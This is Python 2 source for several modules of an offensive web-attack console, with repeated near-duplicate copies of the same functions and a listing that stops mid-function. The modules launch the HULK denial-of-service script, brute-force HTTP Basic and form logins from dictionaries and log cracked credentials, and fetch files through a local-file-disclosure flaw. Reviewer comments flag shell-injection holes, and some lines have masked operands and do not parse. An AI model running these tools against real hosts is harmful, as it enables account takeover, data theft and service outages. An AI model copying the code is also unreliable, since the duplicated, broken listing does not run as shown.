def wuis(run):
    """Prompt handler for the web/whois module.

    When ``run`` equals 1 the lookup starts at once; any other value reads
    one command from the operator.  Handled commands: ``show options``/``sop``,
    ``set target``, ``set port``, ``run``/``r``, ``help``/``h``, ``back``/``b``
    and ``exit``/``x``.  Every path except ``back`` ends by calling ``wuis(0)``
    again, so the prompt loop is implemented by recursion.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/whois"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.space()
        elif command.startswith("set target"):
            # The scheme prefix is removed from the stored value before the
            # helper computes the new one.
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, command, "target")
            d.change("target", defaulthost)
        elif command.startswith("set port"):
            defaultport = ping.update(defaultport, command, "port")
            d.change("port", defaultport)
        elif command in ("exit", "x"):
            d.goodbye()
            # exit() raises SystemExit inside the outer try, so the bare
            # except at the bottom receives it first.
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                try:
                    record = whois.whois(defaulthost)
                    if record:
                        # Dump every attribute of the returned record.
                        for field, value in vars(record).items():
                            print('%20s\t"%s"' % (field, value))
                    # NOTE(review): the listing is collapsed onto one line; the
                    # blank line is assumed to follow the whole dump.
                    print ""
                except:
                    Errors.Errors(event=sys.exc_info(), info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    wuis(0)
def wuis(run):
    """Prompt handler for the web/whois module.

    ``run == 1`` triggers the lookup directly; otherwise a single command is
    read with ``raw_input``.  Commands: ``show options``/``sop``, ``set target``,
    ``set port``, ``run``/``r``, ``help``/``h``, ``back``/``b``, ``exit``/``x``.
    The function calls itself at the end of every path but ``back``.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/whois"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.space()
        elif command.startswith("set target"):
            # Strip the scheme from the current value, then let the helper
            # derive the new target from the typed command.
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, command, "target")
            d.change("target", defaulthost)
        elif command.startswith("set port"):
            defaultport = ping.update(defaultport, command, "port")
            d.change("port", defaultport)
        elif command in ("exit", "x"):
            d.goodbye()
            # SystemExit raised here is seen by the bare except below.
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                try:
                    record = whois.whois(defaulthost)
                    if record:
                        for field, value in vars(record).items():
                            print('%20s\t"%s"' % (field, value))
                    # NOTE(review): position of this blank line is assumed; the
                    # listing has lost its indentation.
                    print ""
                except:
                    Errors.Errors(event=sys.exc_info(), info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    wuis(0)
def wuis(run):
    """Prompt handler for the web/whois module (older variant).

    ``run == 1`` starts the lookup immediately; otherwise one command is read.
    This variant shows a port option but has no ``set port`` command.  The
    prompt loop is recursive: the function calls itself after every command
    except ``back``.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/whois"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            print ""
        elif command.startswith("set target"):
            # Everything after "set target " becomes the target verbatim.
            defaulthost = command[11:]
            d.change("target", defaulthost)
            wuis(0)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                try:
                    record = whois.whois(defaulthost)
                    if record:
                        for field, value in vars(record).items():
                            print('%20s\t"%s"' % (field, value))
                    # NOTE(review): placement assumed; the listing is collapsed.
                    print ""
                except KeyboardInterrupt:
                    d.kbi()
                    # SystemExit from exit() is caught by the bare except
                    # directly below, which reports d.off().
                    exit()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        # Also reached by the SystemExit raised in the "exit" branch.
        d.kbi()
        exit()
    wuis(0)
def wuis(run):
    """Prompt handler for the web/whois module (older variant).

    Reads one command unless ``run == 1``, in which case the lookup runs
    straight away.  A port is displayed but no ``set port`` command exists in
    this variant.  After every command except ``back`` the function re-enters
    itself.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/whois"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            print ""
        elif command.startswith("set target"):
            # The text after "set target " is stored without validation.
            defaulthost = command[11:]
            d.change("target", defaulthost)
            wuis(0)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                try:
                    record = whois.whois(defaulthost)
                    if record:
                        for field, value in vars(record).items():
                            print('%20s\t"%s"' % (field, value))
                    # NOTE(review): placement assumed; the listing is collapsed.
                    print ""
                except KeyboardInterrupt:
                    d.kbi()
                    # The SystemExit raised here lands in the bare except below.
                    exit()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    wuis(0)
def dosweb(run):
    """Prompt handler for the web/dos module.

    Reads one command (or runs directly when ``run == 1``).  ``run`` hands the
    stored target to the bundled ``files/hulk/hulk.py`` script through a shell.
    The function calls itself after every command except ``back``.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/dos"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            print ""
        elif command.startswith("set target"):
            defaulthost = command[11:].replace("http://", "")
            d.change("target", defaulthost)
            dosweb(0)
        elif command.startswith("set port"):
            defaultport = command[9:]
            d.change("port", defaultport)
            dosweb(0)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                # NOTE(review): the stored target is concatenated into a shell
                # command line and run with shell=True, so shell metacharacters
                # in it are interpreted on the operator's own host.
                launch = 'python "files/hulk/hulk.py" http://' + defaulthost
                try:
                    subprocess.call(launch, shell=True)
                except KeyboardInterrupt:
                    d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        # Also reached by the SystemExit raised in the "exit" branch.
        d.kbi()
        exit()
    dosweb(0)
def xjoomla(run):
    """Prompt handler for the web/joomscan module.

    Reads one command (or runs directly when ``run == 1``).  ``run`` changes
    into ``/usr/share/joomscan/`` and starts ``joomscan.pl`` against the stored
    target.  No ``set port`` command exists here although a port is displayed.
    The function calls itself after every command except ``back``.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/joomscan"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            print ""
        elif command.startswith("set target"):
            defaulthost = command[11:]
            d.change("target", defaulthost)
            xjoomla(0)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                # NOTE(review): the target string is appended to a shell command
                # and executed with shell=True; anything the shell treats as
                # syntax in that string runs on the operator's host.
                launch = 'cd /usr/share/joomscan/;./joomscan.pl -u ' + defaulthost
                try:
                    subprocess.call(launch, shell=True)
                except KeyboardInterrupt:
                    d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    xjoomla(0)
def xjoomla(run):
    """Prompt handler for the web/joomscan module.

    One command is read unless ``run == 1``.  ``run`` launches ``joomscan.pl``
    from ``/usr/share/joomscan/`` with the stored target as its ``-u`` value.
    A port is shown in the options but cannot be changed from this prompt.
    Every path except ``back`` ends by calling ``xjoomla(0)`` again.
    """
    global defaulthost, defaultport
    try:
        command = "run" if run == 1 else raw_input(d.prompt("web/joomscan"))

        if command in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            print ""
        elif command.startswith("set target"):
            defaulthost = command[11:]
            d.change("target", defaulthost)
            xjoomla(0)
        elif command in ("exit", "x"):
            d.goodbye()
            exit()
        elif command in ("help", "h"):
            help.help()
        elif command in ("back", "b"):
            return
        elif command in ("run", "r"):
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                # NOTE(review): shell=True plus string concatenation means the
                # target text is parsed by the shell on the operator's host.
                launch = "cd /usr/share/joomscan/;./joomscan.pl -u " + defaulthost
                try:
                    subprocess.call(launch, shell=True)
                except KeyboardInterrupt:
                    d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    xjoomla(0)
def httpbt(run):
    """Prompt handler for the web/httpbt module (HTTP Basic, fixed user).

    Reads one command unless ``run`` is 1.  ``run`` opens one TCP connection
    to the target and sends a GET with an ``Authorization: Basic`` header for
    every line of the password dictionary.  The function calls itself at the
    end of every path except ``back``.
    """
    try:
        global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2
        if run != 1:
            actions = raw_input(d.prompt("web/httpbt"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("patch", "yes", "Folder or dir", defaultpach)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
            print ""
        elif actions[0:10] == "set target":
            # The scheme is stripped from the previous value, not the new one.
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, actions, "target")
            d.change("target", defaulthost)
        elif actions[0:8] == "set port":
            defaultport = ping.update(defaultport, actions, "port")
            d.change("port", defaultport)
        elif actions[0:9] == "set patch":
            defaultpach = ping.update(defaultpach, actions, "patch")
            d.change("patch", defaultpach)
        elif actions[0:8] == "set user":
            defaultuser = ping.update(defaultuser, actions, "user")
            d.change("user", defaultuser)
        elif actions[0:10] == "set dict_1":
            defaultdic2 = ping.update(defaultdic2, actions, "dict_1")
            d.change("dict_1", defaultdic2)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            # SystemExit raised here is seen by the outer bare except first.
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                if True:
                    # One socket is reused for every request below.
                    red = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    red.connect((defaulthost, int(defaultport)))
                    try:
                        d.loading_file()
                        try:
                            with open(defaultdic2, 'r') as passs:
                                for ps in passs:
                                    ps = ps.replace("\n", "")
                                    red.send("GET " + defaultpach + " HTTP/1.1\r\n")
                                    red.send("HOST: " + defaulthost + "\r\n")
                                    red.send("Authorization:Basic " + base64.b64encode(defaultuser + ":" + ps) + "\r\n\r\n")
                                    # At most 1000 bytes of the reply are read.
                                    last = red.recv(1000)
                                    # find() is -1 when "401" is absent and 0 when
                                    # it is at offset 0; both take this branch.
                                    if last.find("401") <= 0:
                                        # The helper receives the credential pair;
                                        # what it stores is not visible here.
                                        ping.savethree("BruteForceHTTP", defaulthost, defaultport, defaultpach, defaultuser, ps)
                                        d.Success(defaultuser, ps)
                                        # NOTE(review): attribute reference only;
                                        # the socket is not closed by this line.
                                        red.close
                                        httpbt(0)
                                    else:
                                        # NOTE(review): the operands between the
                                        # string pieces are masked ("******") in
                                        # this listing; the line does not parse
                                        # as shown.
                                        print " " + Alr + " Checking (username="******")(password="******")"
                                        # NOTE(review): no call; nothing is closed.
                                        red.close
                        except:
                            Errors.Errors(event=sys.exc_info()[0], info=defaultdic2)
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    httpbt(0)
def LFDconsole(run):
    """Prompt handler for the web/lfd-con module.

    Reads one command unless ``run`` is 1.  ``run`` requests the configured
    path; on HTTP 200 it opens an inner ``get <name>`` console that fetches
    ``http://<target><path>?<name>``, writes the body under ``tmp/``, prints it
    with ``cat`` and removes it.  The function calls itself at the end of
    every path except ``back``.
    """
    global defaulthost, defaultfile, defaultport
    try:
        if run != 1:
            actions = raw_input(d.prompt("web/lfd-con"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP, DNS Target", defaulthost)
            d.descrip("patch", "yes", "Path file vul", defaultfile)
            d.descrip("port", "no", "Port service", defaultport)
            d.space()
            LFDconsole(0)
        elif actions[0:9] == "set patch":
            defaultfile = ping.update(defaultfile, actions, "patch")
            d.change("patch", defaultfile)
        elif actions[0:10] == "set target":
            defaulthost = ping.update(defaulthost, actions, "target")
            d.change("target", defaulthost)
        elif actions[0:8] == "set port":
            defaultport = ping.update(defaultport, actions, "port")
            d.change("port", defaultport)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                if True:
                    connection = httplib.HTTPConnection(defaulthost, defaultport)
                    connection.request("GET", defaultfile)
                    response = connection.getresponse()
                    if response.status == 200:
                        print " " + Suf + " File response correctly."
                        d.space()
                        print "\n " + Hlp + " LFD Console help\n"
                        print " ------------------------------------------"
                        print " |" + colors[6] + "Command " + colors[0] + "| " + colors[6] + "Description" + colors[0] + " | " + colors[6] + "Examples" + colors[0] + " |"
                        print " ------------------------------------------"
                        print " | get | Download file | get index.php |"
                        print " ------------------------------------------"
                        d.space()
                        command = 0
                        while command != "exit":
                            command = raw_input(d.Client_prompt("LFD"))
                            if command[:3] == "get":
                                submit = command[4:]
                                try:
                                    # The URL omits the port, so this request
                                    # goes to the default HTTP port.
                                    url = "http://" + defaulthost + defaultfile + "?" + submit
                                    # Text after the last "/" of the whole URL.
                                    file_name = url.split('/')[-1]
                                    u = urllib2.urlopen(url)
                                    # NOTE(review): f is closed only on the
                                    # non-empty success path below.
                                    f = open("tmp/" + file_name, 'wb')
                                    meta = u.info()
                                    try:
                                        file_size = int(meta.getheaders("Content-Length")[0])
                                        if file_size != 0:
                                            print " " + Alr + " Downloading %s Bytes: %s" % (file_name, file_size)
                                            file_size_dl = 0
                                            block_sz = 8192
                                            while True:
                                                buffer = u.read(block_sz)
                                                if not buffer:
                                                    break
                                                file_size_dl += len(buffer)
                                                f.write(buffer)
                                                status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
                                                # Backspaces so a later print
                                                # overwrites the progress text.
                                                status = status + chr(8) * (len(status) + 1)
                                            print " " + Suf + " Completed " + status
                                            f.close()
                                            print " \n -------------------------------- File " + file_name + " Size: " + str(file_size) + " \n"
                                            # NOTE(review): file_name comes from
                                            # operator input and is placed inside
                                            # single quotes in a shell command; a
                                            # quote in it ends the quoting on the
                                            # operator's host.
                                            os.system("cat 'tmp/" + file_name + "' -b -v ")
                                            os.system("rm 'tmp/" + file_name + "'")
                                            print " \n -------------------------------- File " + file_name + " Size: " + str(file_size) + " \n"
                                        else:
                                            print " " + War + " File empy or no exist."
                                    except:
                                        Errors.Errors(event=sys.exc_info(), info=url)
                                except:
                                    Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport)
                    else:
                        print " " + Bad + " File Not response correctly."
                        d.space()
            except:
                Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info(), info=False)
    LFDconsole(0)
def httpformbasebruteforce(run):
    """Prompt handler for the web/formbt module.

    Reads one command unless ``run`` is 1.  ``run`` iterates every user line
    of ``dict_1`` against every password line of ``dict_2`` and submits each
    pair as two form parameters.  The function calls itself at the end of
    every path except ``back``.
    """
    try:
        global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2,defaultdat1,defaultdat2,defaultmeth,defaultcont
        if run!=1:
            actions=raw_input(d.prompt("web/formbt"))
        else:
            actions="run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target","yes","IP or DNS",defaulthost)
            d.descrip("port","no","Port of target",defaultport)
            d.descrip("patch","yes","Folder or dir",defaultpach)
            d.descrip("para_1","yes","Parameter 1",defaultdat1)
            d.descrip("para_2","yes","Parameter 2",defaultdat2)
            d.descrip("method","yes","POST or GET",defaultmeth)
            d.descrip("condit","yes","[if!=]No Logged",defaultcont)
            d.descrip("dict_1","yes","Dictionary user",defaultdic1)
            d.descrip("dict_2","yes","Dictionary pass",defaultdic2)
            print ""
        elif actions[0:10] == "set target":
            defaulthost = actions[11:]
            defaulthost = defaulthost.replace("http://", "")
            d.change("target",defaulthost)
            httpformbasebruteforce(0)
        elif actions[0:8] == "set port":
            defaultport = actions[9:]
            d.change("port",defaultport)
            httpformbasebruteforce(0)
        elif actions[0:9] == "set patch":
            defaultpach = actions[10:]
            d.change("patch",defaultpach)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set condit":
            defaultcont = actions[11:]
            d.change("condit",defaultcont)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set dict_1":
            defaultdic1 = actions[11:]
            d.change("dict_1",defaultdic1)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set dict_2":
            defaultdic2 = actions[11:]
            # NOTE(review): the change is reported under the label "dict_1".
            d.change("dict_1",defaultdic2)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set para_1":
            defaultdat1 = actions[11:]
            d.change("para_1",defaultdat1)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set para_2":
            defaultdat2 = actions[11:]
            d.change("para_2",defaultdat2)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set method":
            defaultmeth = actions[11:]
            d.change("method",defaultmeth)
            httpformbasebruteforce(0)
        elif actions=="exit" or actions=="x":
            d.goodbye()
            exit()
        elif actions=="help" or actions=="h":
            help.help()
        elif actions=="back" or actions=="b":
            return
            # Unreachable duplicate kept from the original.
            return
        elif actions=="run" or actions=="r":
            d.run()
            try:
                ping.live(defaulthost,defaultport)
                if True:
                    try:
                        d.loading()
                        try:
                            with open(defaultdic1,'r') as user:
                                for us in user:
                                    try:
                                        # The password file is reopened for
                                        # every user line.
                                        with open(defaultdic2,'r') as passs:
                                            for ps in passs:
                                                us=us.replace("\n","")
                                                ps=ps.replace("\n","")
                                                params = urllib.urlencode({defaultdat1: us, defaultdat2: ps})
                                                header={"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}
                                                # A new connection per attempt;
                                                # none is closed explicitly.
                                                conn = httplib.HTTPConnection(defaulthost,defaultport)
                                                conn.request(defaultmeth, defaultpach, params, header)
                                                response = conn.getresponse()
                                                ver_source = response.read()
                                                # find() returns -1 when the marker
                                                # is absent, so this is true for any
                                                # body not starting with the marker.
                                                if ver_source.find(defaultcont) != 0:
                                                    # NOTE(review): the credential
                                                    # pair is appended to this log
                                                    # file in cleartext.
                                                    log=open('core/logs/logsBruteForce.log','a')
                                                    log.write('\n ===================================== ')
                                                    log.write('\n Module : BruteForceFormBase')
                                                    log.write('\n Data : '+time.strftime('%c'))
                                                    log.write('\n target : '+defaulthost)
                                                    log.write('\n path : '+defaultpach)
                                                    log.write('\n method : '+defaultmeth)
                                                    log.write('\n Cracked : ('+defaultdat1+' : '+us+' , '+defaultdat2+' : '+ps+')')
                                                    log.close()
                                                    print "\n-["+colors[2]+"*"+colors[0]+"] Successfully with ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")\n"
                                                    httpformbasebruteforce(0)
                                                else:
                                                    print " ["+colors[4]+"!"+colors[0]+"] Checking ("+defaultdat1+"="+us+")("+defaultdat2+"="+ps+")"
                                    except:
                                        # Bare except: any error inside the inner
                                        # loop is reported as a missing file.
                                        d.filenot()
                                        httpformbasebruteforce(0)
                        except:
                            d.filenot()
                            httpformbasebruteforce(0)
                    except:
                        d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        # Also reached by the SystemExit raised in the "exit" branch.
        d.kbi()
        exit()
    httpformbasebruteforce(0)
def httpbt(run):
    """Prompt handler for the web/httpbt module (user and password lists).

    Reads one command unless ``run`` is 1.  ``run`` opens one TCP connection
    and sends a GET with an ``Authorization: Basic`` header for every
    user/password pair from the two dictionaries.  The function calls itself
    at the end of every path except ``back``.
    """
    try:
        global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2
        if run!=1:
            actions=raw_input(d.prompt("web/httpbt"))
        else:
            actions="run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target","yes","IP or DNS",defaulthost)
            d.descrip("port","no","Port of target",defaultport)
            d.descrip("patch","yes","Folder or dir",defaultpach)
            d.descrip("dict_1","yes","Dictionary user",defaultdic1)
            d.descrip("dict_2","yes","Dictionary pass",defaultdic2)
            print ""
        elif actions[0:10] == "set target":
            defaulthost = actions[11:]
            defaulthost = defaulthost.replace("http://", "")
            d.change("target",defaulthost)
            httpbt(0)
        elif actions[0:8] == "set port":
            defaultport = actions[9:]
            d.change("port",defaultport)
            httpbt(0)
        elif actions[0:9] == "set patch":
            defaultpach = actions[10:]
            d.change("patch",defaultpach)
            httpbt(0)
        elif actions[0:10] == "set dict_1":
            defaultdic1 = actions[11:]
            d.change("dict_1",defaultdic1)
            httpbt(0)
        elif actions[0:10] == "set dict_2":
            defaultdic2 = actions[11:]
            # NOTE(review): the change is reported under the label "dict_1".
            d.change("dict_1",defaultdic2)
            httpbt(0)
        elif actions=="exit" or actions=="x":
            d.goodbye()
            exit()
        elif actions=="help" or actions=="h":
            help.help()
        elif actions=="back" or actions=="b":
            return
        elif actions=="run" or actions=="r":
            d.run()
            try:
                ping.live(defaulthost,defaultport)
                if True:
                    # One socket is reused for every request below.
                    red=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    red.connect((defaulthost, int(defaultport)))
                    try:
                        d.loading()
                        try:
                            with open(defaultdic1,'r') as user:
                                for us in user:
                                    try:
                                        with open(defaultdic2,'r') as passs:
                                            for ps in passs:
                                                us=us.replace("\n","")
                                                ps=ps.replace("\n","")
                                                red.send("GET "+defaultpach+" HTTP/1.1\r\n")
                                                red.send("HOST: "+defaulthost+"\r\n")
                                                red.send("Authorization:Basic "+base64.b64encode(us+":"+ps)+"\r\n\r\n")
                                                last=red.recv(1000)
                                                # find() is -1 when "401" is absent
                                                # and 0 at offset 0; both take this
                                                # branch.
                                                if last.find("401")<=0:
                                                    # NOTE(review): the credential
                                                    # pair is appended to this log
                                                    # file in cleartext.
                                                    log=open('core/logs/logsBruteForce.log','a')
                                                    log.write('\n ===================================== ')
                                                    log.write('\n Module : BruteForceHTTP')
                                                    log.write('\n Data : '+time.strftime('%c'))
                                                    log.write('\n target : '+defaulthost)
                                                    log.write('\n port : '+defaultport)
                                                    log.write('\n patch : '+defaultpach)
                                                    # NOTE(review): an operand is
                                                    # masked ("******") in this
                                                    # listing; the line does not
                                                    # parse as shown.
                                                    log.write('\n Cracked : username : '******' , password : '+ps)
                                                    log.close()
                                                    d.sucess(us,ps)
                                                    # NOTE(review): attribute
                                                    # reference only; the socket is
                                                    # not closed by this line.
                                                    red.close
                                                    httpbt(0)
                                                else:
                                                    # NOTE(review): operands masked
                                                    # ("******") in this listing.
                                                    print " ["+colors[4]+"!"+colors[0]+"] Checking (username="******")(password="******")"
                                                    # NOTE(review): no call; nothing
                                                    # is closed.
                                                    red.close
                                    except:
                                        # Bare except: any error in the inner loop
                                        # is reported as a missing file.
                                        d.filenot()
                                        httpbt(0)
                        except:
                            d.filenot()
                            httpbt(0)
                    except:
                        d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        # Also reached by the SystemExit raised in the "exit" branch.
        d.kbi()
        exit()
    httpbt(0)
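def cmysql(run):
    """Prompt handler for the clt/sql module (interactive MySQL client).

    Reads one command unless ``run`` is 1.  ``run`` connects with the stored
    host, user and password and opens a console that passes each typed line
    to ``cursor.execute`` verbatim and prints the fetched rows.  Typing
    ``exit`` leaves the console without sending it to the server, and the
    cursor and connection are closed when the console ends.  The function
    calls itself at the end of every path except ``back``.
    """
    global defaulthost, defaultport, defaultuser, defaultpass
    try:
        if run != 1:
            actions = raw_input(d.prompt("clt/sql"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("pass", "yes", "Password", defaultpass)
            d.space()
            cmysql(0)
        elif actions[0:10] == "set target":
            defaulthost = ping.update(defaulthost, actions, "target")
            d.change("target", defaulthost)
        elif actions[0:8] == "set port":
            defaultport = ping.update(defaultport, actions, "port")
            d.change("port", defaultport)
        elif actions[0:8] == "set user":
            defaultuser = ping.update(defaultuser, actions, "user")
            d.change("user", defaultuser)
        elif actions[0:8] == "set pass":
            defaultpass = ping.update(defaultpass, actions, "pass")
            d.change("pass", defaultpass)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                ping.live(defaulthost, defaultport)
                try:
                    # NOTE(review): defaultport is only given to ping.live; the
                    # connect call does not receive it.
                    con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "")
                    try:
                        print "\n " + Hlp + " SQL Client help\n"
                        print " -------------------------------------------------------------------------------------------------------"
                        print " |" + colors[6] + "Commd" + colors[0] + " | " + colors[6] + "Description" + colors[0] + " | " + colors[6] + "Examples" + colors[0] + " |"
                        print " -------------------------------------------------------------------------------------------------------"
                        print " |show databases | list databases | show databases |"
                        print " |use | select database | use user_table |"
                        print " |show tables | list tables | show tables |"
                        print " |create database | create databases| create database USERS | "
                        print " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | "
                        print " |drop database | drop databases | drop database USERS | "
                        print " |drop table | drop tables | drop table EMAIL | "
                        print " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | "
                        print " |update | update data | update EMAILS set name='Willy' where id=1 | "
                        print " |select | select data | select id, name from EMAILS | "
                        print " -------------------------------------------------------------------------------------------------------"
                        print ""
                        while True:
                            cmd = raw_input(d.Client_prompt('sql'))
                            # Leave before executing, so "exit" is not sent to
                            # the server as a statement.
                            if cmd == "exit":
                                break
                            cur = con.cursor()
                            try:
                                # execute() returns the row count used below.
                                tor = cur.execute(cmd)
                                for x in range(tor):
                                    print cur.fetchone()
                            except:
                                print " " + Bad + " No command '" + cmd + "' found"
                            finally:
                                # One cursor per statement; release it each time.
                                cur.close()
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=False)
                    finally:
                        # Close the session however the console ended.
                        con.close()
                except:
                    Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    cmysql(0)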
def httpformbasebruteforce(run):
    """Prompt handler for the web/formbt module.

    Reads one command unless ``run`` is 1.  ``run`` submits every pairing of
    a ``dict_1`` user line with a ``dict_2`` password line as two form
    parameters.  The function calls itself at the end of every path except
    ``back``.
    """
    try:
        global defaulthost,defaultport,defaultpach,defaultdic1,defaultdic2,defaultdat1,defaultdat2,defaultmeth,defaultcont
        if run!=1:
            actions=raw_input(d.prompt("web/formbt"))
        else:
            actions="run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target","yes","IP or DNS",defaulthost)
            d.descrip("port","no","Port of target",defaultport)
            d.descrip("patch","yes","Folder or dir",defaultpach)
            d.descrip("para_1","yes","Parameter 1",defaultdat1)
            d.descrip("para_2","yes","Parameter 2",defaultdat2)
            d.descrip("method","yes","POST or GET",defaultmeth)
            d.descrip("condit","yes","[if!=]No Logged",defaultcont)
            d.descrip("dict_1","yes","Dictionary user",defaultdic1)
            d.descrip("dict_2","yes","Dictionary pass",defaultdic2)
            print ""
        elif actions[0:10] == "set target":
            defaulthost = actions[11:]
            defaulthost = defaulthost.replace("http://", "")
            d.change("target",defaulthost)
            httpformbasebruteforce(0)
        elif actions[0:8] == "set port":
            defaultport = actions[9:]
            d.change("port",defaultport)
            httpformbasebruteforce(0)
        elif actions[0:9] == "set patch":
            defaultpach = actions[10:]
            d.change("patch",defaultpach)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set condit":
            defaultcont = actions[11:]
            d.change("condit",defaultcont)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set dict_1":
            defaultdic1 = actions[11:]
            d.change("dict_1",defaultdic1)
            httpformbasebruteforce(0)
        elif actions[0:10] == "set dict_2":
            defaultdic2 = actions[11:]
